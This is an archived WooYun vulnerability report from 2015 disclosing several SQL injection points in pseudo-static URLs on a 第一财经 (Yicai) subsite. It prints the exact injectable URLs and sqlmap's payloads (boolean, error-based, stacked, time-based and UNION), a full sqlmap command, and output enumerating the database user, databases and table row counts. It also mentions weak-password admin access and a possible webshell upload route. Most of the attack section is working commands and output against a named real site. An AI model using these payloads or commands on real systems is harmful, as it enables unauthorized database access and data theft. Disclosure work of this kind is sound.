当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160689

漏洞标题:第一财经网某站伪静态SQL注入漏洞打包(弱口令进入后台同样存在伪静态注入)

相关厂商:第一财经

漏洞作者: 路人甲

提交时间:2015-12-14 12:10

修复时间:2016-01-25 18:01

公开时间:2016-01-25 18:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-14: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-25: 细节向公众公开

简要描述:

多处伪静态注入,后台弱口令,同样也存在伪静态注入!~~~

详细说明:

注入点一:
http://lcbt.yicai.com/yicai/index.php/Home/Index/news/classify/6/pid/130/id/140/p/3.html
classify、pid、id后面伪静态注入
选择的时候选择#3*处,后面的什么users、dbs等等都需要这个才能顺利注入出来

1.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: URI
Parameter: #2*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6
/pid/130) AND 3988=3988 AND (1779=1779/id/140/p/3.html
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6
/pid/130) AND (SELECT 4288 FROM(SELECT COUNT(*),CONCAT(0x7173726771,(SELECT (CAS
E WHEN (4288=4288) THEN 1 ELSE 0 END)),0x7169796971,FLOOR(RAND(0)*2))x FROM INFO
RMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3580=3580/id/140/p/3.html
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6
/pid/130); SELECT SLEEP(5)-- /id/140/p/3.html
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6
/pid/130) AND SLEEP(5) AND (4785=4785/id/140/p/3.html
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6
) AND 9793=9793 AND (5327=5327/pid/130/id/140/p/3.html
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6
) AND (SELECT 9240 FROM(SELECT COUNT(*),CONCAT(0x7173726771,(SELECT (CASE WHEN (
9240=9240) THEN 1 ELSE 0 END)),0x7169796971,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (9231=9231/pid/130/id/140/p/3.html
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6
); SELECT SLEEP(5)-- /pid/130/id/140/p/3.html
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6
) AND SLEEP(5) AND (7731=7731/pid/130/id/140/p/3.html
Place: URI
Parameter: #3*
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6
/pid/130/id/140) AND (SELECT 6249 FROM(SELECT COUNT(*),CONCAT(0x7173726771,(SELE
CT (CASE WHEN (6249=6249) THEN 1 ELSE 0 END)),0x7169796971,FLOOR(RAND(0)*2))x FR
OM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3326=3326/p/3.html
    Type: UNION query
    Title: MySQL UNION query (87) - 1 column
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6
/pid/130/id/-2848) UNION ALL SELECT CONCAT(0x7173726771,0x584b4552797377436b77,0
x7169796971)#/p/3.html
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6
/pid/130/id/140); SELECT SLEEP(5)-- /p/3.html
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://lcbt.yicai.com:80/yicai/index.php/Home/Index/news/classify/6
/pid/130/id/140) AND SLEEP(5) AND (9960=9960/p/3.html
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: URI, parameter: #2*, type: Unescaped numeric (default)
[1] place: URI, parameter: #3*, type: Unescaped numeric
[2] place: URI, parameter: #1*, type: Unescaped numeric
[q] Quit
> 1
[10:17:07] [INFO] testing MySQL
[10:17:07] [INFO] confirming MySQL
[10:17:07] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: MySQL >= 5.0.0
[10:17:07] [INFO] fetching current user
[10:17:07] [WARNING] reflective value(s) found and filtering out
current user:    'hzcg@%'
[10:17:07] [INFO] fetching current database
current database:    'hzcg'
[10:17:08] [INFO] testing if current user is DBA
[10:17:08] [INFO] fetching current user
[10:17:08] [INFO] heuristics detected web page charset 'utf-8'
[10:17:08] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False


以下需要sqlmap添加参数--no-cast或者--hex,但是最后dump测试的时候,发现用--no-cast才好
sqlmap.py -u "http://lcbt.yicai.com/yicai/index.php/Home/Index/news/classify/6*/pid/130*/id/140*/p/3*.html" --threads 10 --dbms "MySQL" --users --dbs--no-cast

2.jpg


database management system users [1]:
[*] 'hzcg'@'%'
available databases [2]:
[*] hzcg
[*] information_schema
Database: hzcg
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| x2_questions          | 864     |
| x2_quest2knows        | 759     |
| yicai_file            | 155     |
| yicai_news            | 120     |
| bbs                   | 95      |
| feedback              | 83      |
| x2_examsession        | 54      |
| x2_examhistory        | 50      |
| userinfo              | 44      |
| x2_knows              | 39      |
| x2_questype           | 35      |
| x2_questionrows       | 34      |
| xj_posts              | 29      |
| annotator             | 26      |
| works                 | 24      |
| x2_openbasics         | 18      |
| x2_sections           | 17      |
| x2_exams              | 16      |
| yicai_channel         | 16      |
| x2_user               | 12      |
| xj_fy_sx              | 12      |
| xj_leibie             | 12      |
| x2_coupon             | 10      |
| x2_block              | 8       |
| x2_module             | 7       |
| x2_module_fields      | 7       |
| x2_app                | 6       |
| x2_basic              | 6       |
| x2_session            | 6       |
| yicai_article_article | 6       |
| yicai_article_news    | 6       |
| x2_subject            | 5       |
| xj_kj                 | 5       |
| x2_favor              | 4       |
| x2_special            | 4       |
| yicai_news_classify   | 4       |
| x2_user_group         | 3       |
| x2_gbook              | 2       |
| x2_specialsort        | 2       |
| yicai_member          | 2       |
| yicai_model           | 2       |
| yicai_ucenter_member  | 2       |
| x2_area               | 1       |
| x2_product            | 1       |
| x2_seminar            | 1       |
| yicai_kj              | 1       |
+-----------------------+---------+


3.jpg


4.jpg


5.jpg


6.jpg


注入点二:
http://lcbt.yicai.com/yicai/index.php/Home/index/about/pid/135.html
还是pid后面的存在伪静态注入,不是所有的pid存在。
http://lcbt.yicai.com/yicai/index.php/Home/index/index1/pid/128*.html
这个就不行

7.jpg


注入点三:
http://lcbt.yicai.com/yicai/index.php/Home/Index/lcbt/pid/129/id/138.html
pid、id后面伪静态注入

8.jpg


管理员弱口令进入后台,你们懂得!~~~什么弱口令

9.jpg


10.jpg


11.jpg


至于得到webshell,就不测试了,有上传图片的地方,增加一个新闻内容,然后上传图片,就不绕上传webshell了!~~~
注入点四:
后台也存在多处伪静态注入。怕搞乱数据,就不测试了!~~~自己排查吧!~~~

12.jpg


13.jpg


14.jpg

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-12-14 12:53

厂商回复:

已收到信息,非常感谢您的工作。

最新状态:

暂无